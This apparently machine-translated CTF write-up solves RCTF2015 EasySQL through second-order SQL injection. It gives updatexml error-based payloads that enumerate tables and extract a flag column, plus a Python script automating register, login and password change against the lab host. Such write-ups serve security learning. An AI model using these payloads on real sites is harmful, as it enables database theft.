[RCTF2015] EasySQL do question notes

Others 2019-09-28 03:06:51 views: null

[RCTF2015]EasySQL

  • EasySQL github

  • Open the drone, the interface is as follows

  • To the registration page, I tried it, usernameand emailplace a filter directly fuzz about which characters are banned

  • After successful registration, there is a function to change the password, the test center here should be the secondary injection

  • It has been handling special characters when stored in the database, but when you modify the code here, read out from the database, no data processing

  • Registered user name 'sss"\in the Change Password error there at the Echo

  • Can guess sql statement should be similar like this select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e'

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

  • After testing, flag not in the flag table

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

  • It found that output have length restrictions

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

  • username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

  • Here it is embarrassing, it is better to reversereverse output

  • username=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#

  • Put a script, on behalf of the entire process of this title, but also recorded my silly

    import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

pre = 'peri0d"'
suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
  data = {
      'username' : name,
      'password' : '123',
      'email' : '123',
  }
  r.post(url=url_reg, data=data)

def login(name):
  data = {
      'username' : name,
      'password' : '123',
  }
  r.post(url=url_log, data=data)

def changepwd():
  data = {
      'oldpass' : '',
      'newpass' : '',
  }
  kk = r.post(url=url_change, data=data)
  if 'target' not in kk.text:
      print(kk.text)

for i in s:
  paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
  register(paylaod)
  login(paylaod)
  changepwd()

Guess you like

Origin www.cnblogs.com/peri0d/p/11599643.html
Recommended
Ranking
Business team with OKR removed a stumbling block on the road of success
Huihai Semiconductor Boost LED Constant Current Driver Chip H6911 Solution
Leetcode 128. Longest Consecutive Sequence (Hash + Optimization)
JVM学习笔记(六)JMM和Volatile
java review-Calendar class
LeetCode Brushing Diary Hash Table I
Spring Cloud Config uses SVN as configuration source
__enter __, __ exit__ difference
Remove null values in String array
Basic difference --- child burst suffix array yxs bare title board title monotonous simple application stack string study to understand problems
Daily
More
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)
2024-07-23(0)
2024-07-22(0)
2024-07-21(0)
2024-07-20(0)

Code World

© 2018 codetd.com